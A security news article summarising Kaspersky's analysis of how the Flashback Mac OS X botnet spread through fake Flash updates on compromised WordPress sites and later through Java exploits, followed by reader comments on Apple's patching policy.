Analysis: Flashback Spread Via Social Engineering, Then Java Exploits

Kaspersky Lab‘s latest analysis of the Mac OS X Flashback botnet reveals that the botnet’s malware was spread via drive-by downloads on hacked WordPress web sites.

Kaspersky Lab‘s latest analysis of the Mac OS X Flashback botnet reveals that the botnet’s malware was spread via drive-by downloads on hacked WordPress web sites.

From September 2011 until February 2012, the Flashback creators distributed the trojan through compromised WordPress sites that prompted users to download various iterations of a fake Adobe Flash Player update that was, in actuality, the Mac trojan.

The attacks started using social engineering lures and it  wasn’t until February that the Flashback authors began using exploits to grow the botnet. They exploited known Java vulnerabilities, at least two of which date back as far as June 2009. More importantly, though, Flashback’s creators took advantage of the window of exposure between Oracle and Apple’s patch schedules.

According to Kaspersky’s Alex Gostev, Apple creates its own patches to fix Java vulnerabilities instead of using Oracle’s. So, the bugs had already been patched by Oracle, but Apple had not yet deployed its own patches. Gostev notes that on average, historically speaking, there is a two month delay between Oracle’s fixes, which come first, and Apple’s.

In March 2012, Flashback’s authors started making use of a Russian partner program that somehow injected redirect scripts into legitimate websites. Gostev writes that tens of thousands of WordPress sites were in late February and early March and notes that other estimates have the number as high as 100,000 infected sites. It’s unclear how the sites became infected, but Gostev believes bloggers were either using vulnerable versions of WordPress or had installed the ToolsPack plugin.

Read a more detailed analysis at Securelist.

Suggested articles

plugX malware loader TA416

TA416 APT Rebounds With New PlugX Malware Variant

The TA416 APT has returned in spear phishing attacks against a range of victims – from the Vatican to diplomats in Africa – with a new Golang version of its PlugX malware loader.

Discussion

  • Anonymous on

    16.5% of Mac users are on 10.5. All because Apple won't issue security updates for older OS X versions. Diginotar root certs, Java, Flash, all those vulnerable scripts exposed. Still think Mac's are "safe" for computer newbies and grandma to do her online banking because she's too old to go to the bank in person? Flashflake isn't going anywhere, not until Apple pushes out a mandatory update for all OS X versions which they won't do. Come this summer, when 10.8 rolls out, over 65% of Mac users 10.5 + 10.6 combined, will be vulnerable because Apple only supports the last two operating systems in circulation. Of course Apple don't care, they are using this malware scare to justify closing their platform, making everyone buy software through their overpriced online store. Apple's formula is to win in China where IP laws are weak and Microsoft and open computers failed. BTW Windows 8 is fckugly and going to fail just like their phones.
  • Anonymous on

    Keeping your software up to date is a general rule for a common user if they're worried about safety.

  • Anonymous on

    Problem is 10.5 was shipped with Flash, Java and certs. Most computer users, especially of Apple products are just users, they trust Software Update is taking care of them but they are only getting their iTunes and Safari updates and not much else. OS X is a pretty secure OS, but only if nobody doesn't leave the keys in the door.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.